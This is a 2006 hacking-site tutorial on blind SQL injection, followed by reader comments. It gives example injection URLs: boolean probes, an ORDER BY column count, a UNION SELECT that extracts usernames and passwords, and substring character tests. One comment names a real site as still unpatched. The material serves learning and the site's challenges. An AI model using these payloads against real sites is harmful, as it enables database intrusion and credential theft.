Follow us on Twitter!
Understanding is the answer, hatred is the problem, and hackers are the slaves abused and destroyed in the process of peace online - Deshouleres
Friday, April 18, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 29
Guests Online: 25
Members Online: 4

Registered Members: 82824
Newest Member: devilslegion
Latest Articles

Blind SQL Injection

Arrow Image Blind SQL Injection explained



What is Blind SQL Injection?

Blind SQL Injection works in a similar way to SQL Injection except the page is not displaying an error message.

How do I find an Blind SQL vulnerability?

To find a page which is vulnerable to SQL you need to add to a premade SQL Query. For instance

http://www.example.com/blind/sql/vulnerable.php?id=2

This query is asking;

SELECT (require data) FROM (required form) WHERE id = 2.

We can exploit this by adding and extra query on the end. eg

http://www.example.com/blind/sql/vulnerable.php?id=2 AND 1=1

This should not change the output but still show the AND 1=1 in the url.

How does this help me?

You now have a page which can answer true or false to any query you ask it. By using subqueries and such you can discover data off a database. This takes time and effort and therefore is ineffiecent. A better way to solve this problem is a simple brute force type program which can develop a picture of the database.

Finding Column Number

By using the "ORDER BY" Clause, you can find out how many columns are being queried ie

http://www.example.com/blind/sql/vulnerable.php?id=2 ORDER BY 5

If there are more than 5 columns then you will be able to still see your results, otherwise you will receive and error or a bland page

Grabbing Different Table's Data

You can also use UNION statements to grab data from other tables ie

http://www.example.com/blind/sql/vulnerable.php?id=99999 UNION ALL SELECT null,null,concat(username,password),null,null FROM users

How do I do this?

Well, simply you connect to the vulnerable file and attempt things such as substrings for example;

http://www.example.com/blind/sql/vulnerable.php?id=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 109

This asks for the first user table in the database and the 1st character in it's name. If it fits the critera that the name begins with a letter after m iin the alphabet then it will display the article. Now a bruteforce type program can show the whole name by continueing the sequence until it has all the data.

This is not a very well known exploit and very difficult to prevent and spot. Watch out for it as it can be very useful!!

Thanx for reading guys

mozzer

Comments

mozzeron May 06 2006 - 21:29:04
Is no-one going to comment? Feedback guys?
system_meltdownon May 06 2006 - 21:34:52
Nice article dude Grin
willeHon May 07 2006 - 00:27:39
Good article.
godon May 07 2006 - 17:40:01
lovelah! Pfft
cubeman372on May 08 2006 - 18:19:06
Helpful, Very Helpful.
revolt0163on March 06 2007 - 10:32:22
sorry to put a downer on this article but i thought it was very brief and lacked explanation, like as to why you would use UNION ALL SELECT null,null,concat(username,password),null,null FROM users and how it would work. I get the impression that this article was a rush rip from the white paper that SPI Dynamics wrote.
TWS_Sentinelon June 14 2007 - 01:28:04
there was an excellent video on this type exploit someone made hacking http://www.theecologist.org/ ... surprisingly they still hadn't patched the site when I last tried it.
Zephyr_Pureon October 12 2007 - 02:09:25
The article addressed all of the major considerations of SQL injection and blind SQL injection. I would've liked to see more emphasis on techniques inherent to blind SQL injection (i.e., the methodical location of relevant data through substrings), but your article served as a good introduction.
SilverHackeron October 29 2007 - 02:15:26
Great Job Grin It Greatly Reinforced my SQL Knowledge Grin
NightSpyderon November 28 2007 - 19:27:29
Thanks. Google wasn't helping for shit. Now maybe Basic 18 will stop being a ball buster.
Ayon April 13 2008 - 01:59:00
I wish this article expanded a little more on how you got the names of the table and the rows. I'm still thrown by that. If you could add a bit more on that, that'd be good.
BlaXon February 07 2009 - 17:34:54
neat..
jbootstrapon August 01 2011 - 12:59:09
Very nice indeed! Clear article.
Lionzon January 29 2012 - 18:32:52
i feel hard to understand it i'am searching for an easier article around network iam never telling you that your article bad it's was helpful and i rated it as very good Wink
olichipon April 20 2012 - 00:20:18
@Lionz what?????
spidermonkeyon June 17 2013 - 08:51:09
Nicely written. I find my SQL knowledge is a bit light for this article. I'm trying to understand it for Basic Web Challenge 18. The statements for unions and substrings are my problem. It would be helpful for me and for others, I think, if there were more detailed explanation of these lengthier statements, how they work and how they can be modified. Does anyone know of articles where I can learn more about this?
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.